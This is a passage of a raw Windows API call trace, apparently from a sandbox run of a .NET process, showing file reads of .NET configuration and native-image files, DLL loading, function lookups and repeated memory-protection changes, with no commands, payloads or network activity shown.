pbstr=0x41b098*="C:\\Windows\\assembly\\pubpol109.dat") returned 1 [0063.104] GetThreadLocale () returned 0x409 [0063.104] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\pubpol109.dat", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.105] GetThreadLocale () returned 0x409 [0063.105] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\pubpol109.dat", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\pubpol109.dat", nBufferLength=0x104, lpBuffer=0x41ae1c, lpFilePart=0x41ae18 | out: lpBuffer="C:\\Windows\\assembly\\pubpol109.dat", lpFilePart=0x41ae18*="pubpol109.dat") returned 0x21 [0063.105] SysReAllocStringLen (in: pbstr=0x41b098*="C:\\Windows\\assembly\\pubpol109.dat", psz="C:\\Windows\\assembly\\pubpol109.dat", len=0x21 | out: pbstr=0x41b098*="C:\\Windows\\assembly\\pubpol109.dat") returned 1 [0063.105] SysReAllocStringLen (in: pbstr=0x41b048*=0x0, psz="C:\\Windows\\assembly\\pubpol109.dat", len=0x21 | out: pbstr=0x41b048*="C:\\Windows\\assembly\\pubpol109.dat") returned 1 [0063.105] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\pubpol109.dat", cchLength=0x21 | out: lpsz="c:\\windows\\assembly\\pubpol109.dat") returned 0x21 [0063.105] SysReAllocStringLen (in: pbstr=0x41b098*="C:\\Windows\\assembly\\pubpol109.dat", psz="c:\\windows\\assembly\\pubpol109.dat", len=0x21 | out: pbstr=0x41b098*="c:\\windows\\assembly\\pubpol109.dat") returned 1 [0063.105] SetLastError (dwErrCode=0x0) [0063.109] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x248 [0063.109] GetLastError () returned 0x0 [0063.109] SysReAllocStringLen (in: pbstr=0x41b804*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41b804*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0063.109] GetThreadLocale () returned 0x409 [0063.109] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.109] GetThreadLocale () returned 0x409 [0063.109] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x41b588, lpFilePart=0x41b584 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x41b584*="machine.config") returned 0x43 [0063.109] SysReAllocStringLen (in: pbstr=0x41b804*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41b804*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0063.109] SysReAllocStringLen (in: pbstr=0x41b7b4*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41b7b4*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0063.109] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0063.109] SysReAllocStringLen (in: pbstr=0x41b804*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41b804*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0063.109] SetLastError (dwErrCode=0x0) [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] GetCurrentThreadId () returned 0xba4 [0063.110] SetEvent (hEvent=0xbc) returned 1 [0063.110] ReadFile (in: hFile=0x248, lpBuffer=0x729fb0, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x41b768, lpOverlapped=0x0 | out: lpBuffer=0x729fb0*, lpNumberOfBytesRead=0x41b768*=0xfff, lpOverlapped=0x0) returned 1 [0063.113] GetCurrentThreadId () returned 0xba4 [0063.113] GetCurrentThreadId () returned 0xba4 [0063.113] GetCurrentThreadId () returned 0xba4 [0063.113] GetCurrentThreadId () returned 0xba4 [0063.113] GetCurrentThreadId () returned 0xba4 [0063.113] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.113] GetCurrentThreadId () returned 0xba4 [0063.114] GetCurrentThreadId () returned 0xba4 [0063.114] GetCurrentThreadId () returned 0xba4 [0063.114] SetEvent (hEvent=0xbc) returned 1 [0063.114] ReadFile (in: hFile=0x248, lpBuffer=0x727fa8, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x41b750, lpOverlapped=0x0 | out: lpBuffer=0x727fa8*, lpNumberOfBytesRead=0x41b750*=0x17f7, lpOverlapped=0x0) returned 1 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] GetCurrentThreadId () returned 0xba4 [0063.118] SetEvent (hEvent=0xbc) returned 1 [0063.119] ReadFile (in: hFile=0x248, lpBuffer=0x727fa8, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x41b760, lpOverlapped=0x0 | out: lpBuffer=0x727fa8*, lpNumberOfBytesRead=0x41b760*=0x1001, lpOverlapped=0x0) returned 1 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.121] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.121] GetCurrentThreadId () returned 0xba4 [0063.122] SetEvent (hEvent=0xbc) returned 1 [0063.122] ReadFile (in: hFile=0x248, lpBuffer=0x727fa8, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x41b760, lpOverlapped=0x0 | out: lpBuffer=0x727fa8*, lpNumberOfBytesRead=0x41b760*=0x1002, lpOverlapped=0x0) returned 1 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] GetCurrentThreadId () returned 0xba4 [0063.125] SetEvent (hEvent=0xbc) returned 1 [0063.125] ReadFile (in: hFile=0x248, lpBuffer=0x72efc0, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x41b754, lpOverlapped=0x0 | out: lpBuffer=0x72efc0*, lpNumberOfBytesRead=0x41b754*=0x1f28, lpOverlapped=0x0) returned 1 [0063.129] GetCurrentThreadId () returned 0xba4 [0063.129] ResetEvent (hEvent=0xb8) returned 1 [0063.129] GetCurrentThreadId () returned 0xba4 [0063.129] GetCurrentThreadId () returned 0xba4 [0063.129] GetCurrentThreadId () returned 0xba4 [0063.129] GetCurrentThreadId () returned 0xba4 [0063.129] ResetEvent (hEvent=0xb8) returned 1 [0063.129] GetCurrentThreadId () returned 0xba4 [0063.129] GetCurrentThreadId () returned 0xba4 [0063.129] SetEvent (hEvent=0xbc) returned 1 [0063.129] SetEvent (hEvent=0xb8) returned 1 [0063.129] CloseHandle (hObject=0x248) returned 1 [0063.136] SysReAllocStringLen (in: pbstr=0x41b738*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41b738*="kernel32.dll") returned 1 [0063.136] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.136] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0063.145] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0063.146] GetLastError () returned 0x0 [0063.146] SysReAllocStringLen (in: pbstr=0x41b2a0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", len=0x68 | out: pbstr=0x41b2a0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux") returned 1 [0063.146] GetThreadLocale () returned 0x409 [0063.146] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.146] GetThreadLocale () returned 0x409 [0063.146] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x41b024, lpFilePart=0x41b020 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", lpFilePart=0x41b020*="System.ni.dll.aux") returned 0x68 [0063.146] SysReAllocStringLen (in: pbstr=0x41b2a0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", len=0x68 | out: pbstr=0x41b2a0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux") returned 1 [0063.146] SysReAllocStringLen (in: pbstr=0x41b250*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", len=0x68 | out: pbstr=0x41b250*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux") returned 1 [0063.146] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", cchLength=0x68 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux") returned 0x68 [0063.146] SysReAllocStringLen (in: pbstr=0x41b2a0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux", len=0x68 | out: pbstr=0x41b2a0*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\500ffa28b327e171fe664023003e947e\\system.ni.dll.aux") returned 1 [0063.147] SetLastError (dwErrCode=0x0) [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] SetEvent (hEvent=0xbc) returned 1 [0063.147] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26c [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] GetCurrentThreadId () returned 0xba4 [0063.147] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0063.148] GetCurrentThreadId () returned 0xba4 [0063.148] GetCurrentThreadId () returned 0xba4 [0063.148] GetCurrentThreadId () returned 0xba4 [0063.148] SetEvent (hEvent=0xbc) returned 1 [0063.148] ReadFile (in: hFile=0x24c, lpBuffer=0x727f10, nNumberOfBytesToRead=0x26c, lpNumberOfBytesRead=0x41b354, lpOverlapped=0x0 | out: lpBuffer=0x727f10*, lpNumberOfBytesRead=0x41b354*=0x26c, lpOverlapped=0x0) returned 1 [0063.150] GetCurrentThreadId () returned 0xba4 [0063.150] ResetEvent (hEvent=0xb8) returned 1 [0063.150] GetCurrentThreadId () returned 0xba4 [0063.150] GetCurrentThreadId () returned 0xba4 [0063.150] GetCurrentThreadId () returned 0xba4 [0063.150] GetCurrentThreadId () returned 0xba4 [0063.150] ResetEvent (hEvent=0xb8) returned 1 [0063.150] GetCurrentThreadId () returned 0xba4 [0063.150] GetCurrentThreadId () returned 0xba4 [0063.150] SetEvent (hEvent=0xbc) returned 1 [0063.150] SetEvent (hEvent=0xb8) returned 1 [0063.150] CloseHandle (hObject=0x24c) returned 1 [0063.177] SysReAllocStringLen (in: pbstr=0x41a150*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41a150*="kernel32.dll") returned 1 [0063.177] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.177] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.180] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0063.180] GetCurrentThreadId () returned 0xba4 [0063.180] ResetEvent (hEvent=0xb8) returned 1 [0063.180] GetCurrentThreadId () returned 0xba4 [0063.180] GetCurrentThreadId () returned 0xba4 [0063.181] GetCurrentThreadId () returned 0xba4 [0063.181] GetCurrentThreadId () returned 0xba4 [0063.181] ResetEvent (hEvent=0xb8) returned 1 [0063.181] GetCurrentThreadId () returned 0xba4 [0063.181] GetCurrentThreadId () returned 0xba4 [0063.181] SetEvent (hEvent=0xbc) returned 1 [0063.181] SetEvent (hEvent=0xb8) returned 1 [0063.181] CloseHandle (hObject=0x24c) returned 1 [0063.194] SysReAllocStringLen (in: pbstr=0x41a150*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41a150*="kernel32.dll") returned 1 [0063.194] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.194] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.197] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0063.198] GetCurrentThreadId () returned 0xba4 [0063.198] ResetEvent (hEvent=0xb8) returned 1 [0063.199] GetCurrentThreadId () returned 0xba4 [0063.199] GetCurrentThreadId () returned 0xba4 [0063.199] GetCurrentThreadId () returned 0xba4 [0063.199] GetCurrentThreadId () returned 0xba4 [0063.199] ResetEvent (hEvent=0xb8) returned 1 [0063.199] GetCurrentThreadId () returned 0xba4 [0063.199] GetCurrentThreadId () returned 0xba4 [0063.199] SetEvent (hEvent=0xbc) returned 1 [0063.199] SetEvent (hEvent=0xb8) returned 1 [0063.199] CloseHandle (hObject=0x24c) returned 1 [0063.201] SysReAllocStringLen (in: pbstr=0x41a858*=0x0, psz="System.ni.dll", len=0xd | out: pbstr=0x41a858*="System.ni.dll") returned 1 [0063.201] CharLowerBuffW (in: lpsz="System.ni.dll", cchLength=0xd | out: lpsz="system.ni.dll") returned 0xd [0063.201] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x725b0000 [0063.311] GetLastError () returned 0x0 [0063.375] SysReAllocStringLen (in: pbstr=0x41c9d0*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x41c9d0*="ole32.dll") returned 1 [0063.375] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0063.375] LoadLibraryExW (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0063.375] GetLastError () returned 0x0 [0063.375] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766214a0, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x4, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x20) returned 0x0 [0063.376] GetCurrentProcess () returned 0xffffffff [0063.376] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766214a0, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x20, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x4) returned 0x0 [0063.376] GetCurrentProcess () returned 0xffffffff [0063.376] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766214b0, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x4, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x20) returned 0x0 [0063.376] GetCurrentProcess () returned 0xffffffff [0063.376] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766214b0, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x20, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x4) returned 0x0 [0063.376] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766219a8, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x4, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x20) returned 0x0 [0063.376] GetCurrentProcess () returned 0xffffffff [0063.376] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766219a8, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x20, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x4) returned 0x0 [0063.377] GetCurrentProcess () returned 0xffffffff [0063.377] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766219ac, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x4, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x20) returned 0x0 [0063.377] GetCurrentProcess () returned 0xffffffff [0063.377] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x766219ac, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x20, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x4) returned 0x0 [0063.377] GetCurrentProcess () returned 0xffffffff [0063.377] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x76621a00, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x4, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x20) returned 0x0 [0063.377] GetCurrentProcess () returned 0xffffffff [0063.377] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9b8*=0x76621a00, NumberOfBytesToProtect=0x41c9bc, NewAccessProtection=0x20, OldAccessProtection=0x41c9f0 | out: BaseAddress=0x41c9b8*=0x76621000, NumberOfBytesToProtect=0x41c9bc, OldAccessProtection=0x41c9f0*=0x4) returned 0x0 [0063.378] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateGuid") returned 0x766615d5 [0063.378] CoCreateGuid (in: pguid=0x41d644 | out: pguid=0x41d644*(Data1=0xa2eefc23, Data2=0xdab6, Data3=0x4e6f, Data4=([0]=0x84, [1]=0x2, [2]=0x1f, [3]=0xc8, [4]=0x4b, [5]=0x47, [6]=0x8e, [7]=0x68))) returned 0x0 [0063.411] SysReAllocStringLen (in: pbstr=0x41d2a0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41d2a0*="kernel32.dll") returned 1 [0063.411] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.412] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0063.412] GetLastError () returned 0x0 [0063.415] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEvent") returned 0x0 [0063.419] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0063.420] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x248 [0063.422] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x24c [0063.444] SysReAllocStringLen (in: pbstr=0x41ca10*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x41ca10*="advapi32.dll") returned 1 [0063.444] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0063.444] LoadLibraryExW (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0063.444] GetLastError () returned 0x0 [0063.444] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711520, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.445] GetCurrentProcess () returned 0xffffffff [0063.445] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711520, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.445] GetCurrentProcess () returned 0xffffffff [0063.445] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711540, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.445] GetCurrentProcess () returned 0xffffffff [0063.445] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711540, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.445] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x7771175c, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.445] GetCurrentProcess () returned 0xffffffff [0063.446] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x7771175c, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.446] GetCurrentProcess () returned 0xffffffff [0063.446] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711768, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.446] GetCurrentProcess () returned 0xffffffff [0063.446] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x77711768, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.446] GetCurrentProcess () returned 0xffffffff [0063.446] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x777117b8, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.447] GetCurrentProcess () returned 0xffffffff [0063.447] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x777117b8, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.447] GetCurrentProcess () returned 0xffffffff [0063.447] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x777117bc, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x4, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x20) returned 0x0 [0063.447] GetCurrentProcess () returned 0xffffffff [0063.447] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41c9f8*=0x777117bc, NumberOfBytesToProtect=0x41c9fc, NewAccessProtection=0x20, OldAccessProtection=0x41ca30 | out: BaseAddress=0x41c9f8*=0x77711000, NumberOfBytesToProtect=0x41c9fc, OldAccessProtection=0x41ca30*=0x4) returned 0x0 [0063.447] GetCurrentProcess () returned 0xffffffff [0063.447] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, 